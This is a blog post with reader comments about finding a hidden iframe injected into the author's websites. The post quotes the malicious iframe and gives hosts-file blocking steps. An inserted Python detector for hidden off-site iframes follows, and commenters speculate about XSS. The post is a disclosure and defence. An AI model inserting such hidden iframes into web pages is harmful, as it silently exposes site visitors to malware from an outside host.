Recently I noticed something other than Google Analytics loading in the status bar when I visited some of my sites, so I thought I'll have a closer look.
Of course, I removed the links without thinking, but I did save the script.
Here is how the script looks:
Here is what the script does:
<iframe src="http://tumultuosum.com/ep/index.php" style="visibility: hidden; display: none"></iframe>
Here is the iframe content:
Probably a trojan of some kind, didn't feel like looking any further.
Interesting thing is how that code got on my websites. I'm sure my account was not hacked, if it was so, all my sites would have been messed with, so I'm guessing it was the server that got hacked. What people would do for a few extra links and traffic.
As for the surfers, I guess you should block that site so you won't get infected with who knows what.
Easiest way to do that is to edit your hosts file.
Where to find hosts file:
Windows Vista = C:\WINDOWS\SYSTEM32\DRIVERS\ETC
Windows XP = C:\WINDOWS\SYSTEM32\DRIVERS\ETC
Windows 2K = C:\WINNT\SYSTEM32\DRIVERS\ETC
Win 98/ME = C:\WINDOWS
What the hosts file contents look like:
Edit and add the unwanted site:
How it should look now:
127.0.0.1 localhost
127.0.0.1 tumultuosum.com
So if anyone knows John Phillips, the person that seems to own the domain “tumultuosum”, tell him that either he got hacked or he's just a big fat jerk and a lousy hacker.
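For site owners who want to check their own pages for this kind of injection, the following is an added example (not part of the original post) that flags iframes which are both hidden and loaded from a host outside an allow-list. The allow-listed host `www.example.org` and the sample page are constructed for illustration; only the injected iframe line is taken from the post.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline styles that hide an element from the visitor.
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

def is_hidden(attrs):
    """True if the iframe is styled or sized so that it cannot be seen."""
    if "hidden" in attrs or HIDDEN_STYLE.search(attrs.get("style") or ""):
        return True
    # 0- or 1-pixel frames are the other common way to hide one.
    return any(re.fullmatch(r"[01](px)?", (attrs.get(d) or "").strip().lower())
               for d in ("width", "height"))

class IframeFinder(HTMLParser):
    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed = {h.lower() for h in allowed_hosts}
        self.findings = []  # (line, host, src)

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        src = a.get("src") or ""
        host = (urlparse(src).hostname or "").lower()
        # Report only frames that are both invisible and off-site.
        if host and host not in self.allowed and is_hidden(a):
            self.findings.append((self.getpos()[0], host, src))

def find_hidden_iframes(html, allowed_hosts=()):
    finder = IframeFinder(allowed_hosts)
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample page: one legitimate frame plus the injected one from the post.
SAMPLE = """<html><body>
<p>Post text</p>
<iframe src="https://www.example.org/widget" width="300" height="200"></iframe>
<iframe src="http://tumultuosum.com/ep/index.php" style="visibility: hidden; display: none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for line, host, src in find_hidden_iframes(SAMPLE, {"www.example.org"}):
        print(f"line {line}: hidden iframe loading from {host} ({src})")
```

Run it over the template and theme files on disk as well as the rendered pages, since an injected frame can live in either.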
5 thoughts on “Hacked!?”
Wow, I can’t believe they were able to get into your server… No doubt, what some people will do…
I use a shared hosting plan from Host I Can and have not found such hacks but I hear all the time that shared hosting plans get hacked a lot because once in, a hacker can access hundreds of sites and gain links or do destruction easily. Unfortunately I cannot do anything to the server to protect myself.
They did not access your server, and your site is still vulnerable. The exploit used in this attack is called XSS or cross-site scripting. XSS is a vulnerability in web applications & forms which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Often during an attack “everything looks fine” to the end-user.
I see you are using WordPress which is rife with XSS vulnerabilities, however, a lot of web applications are, it doesn’t mean WP is crap. Just try and update to the latest version if you haven’t and start looking for WP and XSS related info so you can fix the hole.
I came across this blog the other day and you got some great info here – thanks.
Or use the NoScript plugin for Firefox. Additionally, I’ve seen sites being hacked due to FrontPage Extensions not being removed properly. If you don’t know, Microsoft has stopped development and support for FrontPage Extensions.